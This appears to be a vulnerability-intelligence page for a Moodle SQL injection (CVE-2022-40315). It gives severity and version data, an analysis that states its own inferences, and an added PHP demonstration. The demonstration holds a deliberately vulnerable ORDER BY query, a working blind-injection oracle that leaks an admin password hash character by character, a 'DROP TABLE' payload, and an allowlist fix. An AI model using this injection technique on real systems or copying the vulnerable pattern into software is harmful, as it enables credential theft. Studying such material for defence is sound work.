
CVE-2022-40315:
Moodle Minor SQL injection risk in admin user browsing

CVSS Score (v3.1): 9.8

Basic Information

EPSS Score: 0.60913%
Published: 10/1/2022
Updated: 4/23/2024
KEV Status: No
Technology: PHP

Technical Details

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Package Name     Ecosystem   Vulnerable Versions   First Patched Version
moodle/moodle    composer    >= 3.9, < 3.9.17      3.9.17
moodle/moodle    composer    >= 3.11, < 3.11.10    3.11.10
moodle/moodle    composer    >= 4.0, < 4.0.4       4.0.4

Vulnerability Intelligence

Root Cause Analysis (Miggo AI)

The vulnerability is in the admin user-browsing interface (the "browse list of users" site administration page), which queries the database for user records and applies the administrator's filter and sort parameters to that query. Moodle's user-management functions (such as get_users) take those parameters from admin-controlled request input. The CWE-89 classification, combined with a user listing driven by such inputs, points to SQL construction in the admin user-management code that interpolates a request parameter directly into the query string instead of binding it. This is an inference from the advisory text; the page does not identify the exact function or parameter. Moodle describes the risk as "limited", which fits a page reachable only by site administrators and, plausibly, a parameter whose influence on the query is constrained (a sort or filter fragment rather than a free-form value). Note, however, that the NVD vector above scores the issue PR:N with C:H/I:H/A:H, so the 9.8 should be read as an upper bound that gives no credit for the admin-only reachability of the page.
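The following is an added example, not Moodle's code and not the patch for this CVE: it models the CWE-89 pattern the analysis describes, an admin-supplied sort column interpolated into ORDER BY, where SQL placeholders cannot help because they bind values, never identifiers or keywords. The table layout, function names (list_users_vulnerable, list_users_safe, hash_starts_with) and sample rows are all constructed for illustration, and PDO with in-memory SQLite stands in for Moodle's $DB layer. The oracle function shows why even a "limited" ORDER BY injection is serious: the order of the returned rows leaks one character of another user's password hash per request.

```php
<?php
declare(strict_types=1);

// Added example (not Moodle code): ORDER BY injection through a sort
// parameter, a blind-extraction oracle built on it, and the allowlist fix.

function seed_users(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, email TEXT, password TEXT)');
    $st = $db->prepare('INSERT INTO user (username, email, password) VALUES (?, ?, ?)');
    // Constructed sample rows; the hash strings are placeholders, not real bcrypt output.
    foreach ([
        ['admin', 'admin@example.test', '$2y$10$adminhashplaceholder'],
        ['alice', 'alice@example.test', '$2y$10$alicehashplaceholder'],
        ['bob',   'bob@example.test',   '$2y$10$bobhashplaceholder'],
    ] as $row) {
        $st->execute($row);
    }
    return $db;
}

/** Vulnerable listing: $sort and $dir are pasted into the SQL text verbatim. */
function list_users_vulnerable(PDO $db, string $search, string $sort, string $dir): array
{
    // The search value is bound correctly; the injection point is ORDER BY.
    $sql = "SELECT id, username FROM user WHERE username LIKE :q ORDER BY $sort $dir";
    $st = $db->prepare($sql);
    $st->execute([':q' => '%' . $search . '%']);
    return array_column($st->fetchAll(PDO::FETCH_ASSOC), 'username');
}

/** Hardened listing: only allowlisted column names and directions reach the SQL. */
function list_users_safe(PDO $db, string $search, string $sort, string $dir): array
{
    $columns = ['id', 'username', 'email'];
    $dir = strtoupper($dir);
    if (!in_array($sort, $columns, true) || !in_array($dir, ['ASC', 'DESC'], true)) {
        throw new InvalidArgumentException('unexpected sort parameter');
    }
    // Interpolation is now safe: $sort and $dir can only be allowlisted tokens.
    $sql = "SELECT id, username FROM user WHERE username LIKE :q ORDER BY $sort $dir";
    $st = $db->prepare($sql);
    $st->execute([':q' => '%' . $search . '%']);
    return array_column($st->fetchAll(PDO::FETCH_ASSOC), 'username');
}

/**
 * Blind oracle on the vulnerable listing. admin has id 1: sorting ascending
 * by id puts admin first, sorting ascending by -id puts admin last, so the
 * position of the admin row answers "does the hash start with $guess?".
 */
function hash_starts_with(PDO $db, string $guess): bool
{
    $guess = str_replace("'", "''", $guess); // keep the attacker's own payload well-formed
    $sort = "(CASE WHEN (SELECT substr(password, 1, 1) FROM user WHERE username = 'admin')"
          . " = '$guess' THEN id ELSE -id END)";
    $rows = list_users_vulnerable($db, '', $sort, 'ASC');
    return $rows[0] === 'admin';
}

$db = seed_users();
foreach (['$', 'x'] as $guess) {
    printf("first hash char is '%s': %s\n", $guess, hash_starts_with($db, $guess) ? 'yes' : 'no');
}
print_r(list_users_safe($db, 'a', 'username', 'desc'));
try {
    list_users_safe($db, '', 'id; DROP TABLE user', 'ASC');
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
```

Run with php-cli built with pdo_sqlite. The first guess matches and the second does not, which is exactly the one-bit-per-request leak an attacker repeats across positions and characters. The fix is deliberately not escaping: identifiers and keywords have no safe quoting in the general case, so the only robust control is to compare the parameter against a fixed list of column names the page actually supports and reject anything else before it touches the query. In Moodle terms this means cleaning the request parameter to a restricted type (for example optional_param with PARAM_ALPHA) and still checking it against the known column list, since type cleaning alone does not prove the value is a real column.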


WAF Protection Rules

WAF Rule

A limited SQL injection risk was identified in the "browse list of users" site administration page.
